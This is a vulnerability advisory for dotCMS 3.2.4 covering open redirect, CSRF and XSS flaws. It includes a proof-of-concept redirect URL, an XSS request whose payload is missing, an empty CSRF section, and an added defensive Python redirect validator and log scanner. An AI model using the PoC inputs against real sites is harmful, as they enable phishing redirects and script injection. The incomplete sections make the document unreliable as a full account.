dotCMS 3.2.4 Multiple Vulnerabilities


Vendor: dotCMS Software, LLC
Product web page: http://www.dotcms.com
Affected version: 3.2.4 (Enterprise)

Summary: DotCMS is the next generation of Content Management System (CMS).
Quick to deploy, open source, Java-based, open APIs, extensible and massively
scalable, dotCMS can rapidly deliver personalized, engaging multi-channel
sites, web apps, campaigns, one-pagers, intranets - all types of content
driven experiences - without calling in your developers.

Desc: The application suffers from multiple security vulnerabilities,
including Open Redirection, multiple Stored and Reflected XSS, and
Cross-Site Request Forgery (CSRF).

Tested on: Apache-Coyote/1.1

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                             @zeroscience

Advisory ID: ZSL-2015-5290
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php

Vendor: http://dotcms.com/docs/latest/change-log
        https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305
        https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3

19.11.2015

--


1. Open Redirect via '_EXT_LANG_redirect' GET parameter:
--------------------------------------------------------

http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia


2. CSRF Add Admin:
------------------


3. Multiple Stored And Reflected XSS:
-------------------------------------

POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1
Host: 127.0.0.1

callCount=1
windowName=c0-param0
c0-scriptName=TagAjax
c0-methodName=addTag
c0-id=0
c0-param0=
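The following is an added example, not code from this advisory or from the dotCMS project. It shows the check a redirect-after-save handler needs for a parameter like '_EXT_LANG_redirect' from section 1: only a rooted same-site path or an absolute URL whose hostname is on an explicit allowlist is followed. The allowlisted hostnames and the two access-log lines are constructed; the PoC URL is the one from section 1, used here as test input and to show how the same check flags the attempt in logs.

```python
"""Redirect-target validation for a parameter such as '_EXT_LANG_redirect'.

Added example; not code from the advisory or from dotCMS. The allowlist of
hostnames and the access-log lines below are constructed for illustration.
"""
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Assumption: hostnames the CMS itself is served from. Anything else is off-site.
ALLOWED_HOSTS = {"127.0.0.1", "cms.example.internal"}

# PoC URL from section 1 of the advisory (its redirect target is an external host).
POC_URL = ("http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8"
           "&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view"
           "&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language"
           "&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0"
           "&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia")


def is_safe_redirect(target: str, allowed_hosts=frozenset(ALLOWED_HOSTS)) -> bool:
    """Accept only rooted same-site paths or absolute URLs to an allowlisted host."""
    if not target or any(c.isspace() for c in target):
        return False
    # Browsers treat a backslash in the authority like a slash, so '/\evil' is '//evil'.
    target = target.replace("\\", "/")
    parts = urlsplit(target)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False  # javascript:, data:, and similar schemes
    if parts.netloc:
        # Absolute ("http://host/...") or protocol-relative ("//host/...") URL:
        # compare the parsed hostname, never a string prefix of the raw value.
        return (parts.hostname or "").lower() in allowed_hosts
    if parts.scheme:
        return False  # "http:host" has a scheme but no authority; reject it
    # A plain path: must be rooted with exactly one leading slash.
    return target.startswith("/") and not target.startswith("//")


def redirect_param_from_url(url: str, param: str = "_EXT_LANG_redirect") -> Optional[str]:
    """Return the decoded value of the redirect parameter, or None if absent."""
    values = parse_qs(urlsplit(url).query).get(param)
    return values[0] if values else None


def flag_open_redirect_attempts(log_lines: List[str],
                                param: str = "_EXT_LANG_redirect") -> List[Tuple[str, str]]:
    """Scan combined-format access-log lines; return (request path, off-site target) pairs."""
    flagged = []
    for line in log_lines:
        fields = line.split('"')
        if len(fields) < 2:
            continue
        request = fields[1].split(" ")  # e.g. GET /c/portal/layout?... HTTP/1.1
        if len(request) < 2:
            continue
        target = redirect_param_from_url(request[1], param)
        if target is not None and not is_safe_redirect(target):
            flagged.append((request[1], target))
    return flagged


# Constructed access-log lines: one benign same-site redirect, one PoC-style off-site request.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Nov/2015:10:00:00 +0100] "GET /c/portal/layout?p_p_id=EXT_LANG'
    '&_EXT_LANG_cmd=save&_EXT_LANG_redirect=/c/portal/layout HTTP/1.1" 302 0',
    '10.0.0.9 - - [19/Nov/2015:10:00:01 +0100] "GET '
    + POC_URL[len("http://127.0.0.1"):] + ' HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    print("PoC redirect target:", redirect_param_from_url(POC_URL))
    for path, target in flag_open_redirect_attempts(SAMPLE_LOG):
        print("off-site redirect attempt:", target, "in", path)
```

The decision is made on the parsed hostname rather than on a prefix of the raw string, because prefix checks are defeated by values such as "http://127.0.0.1.attacker-controlled-host/" or userinfo tricks, and protocol-relative and backslash forms are normalised before parsing so they cannot slip through as "relative paths".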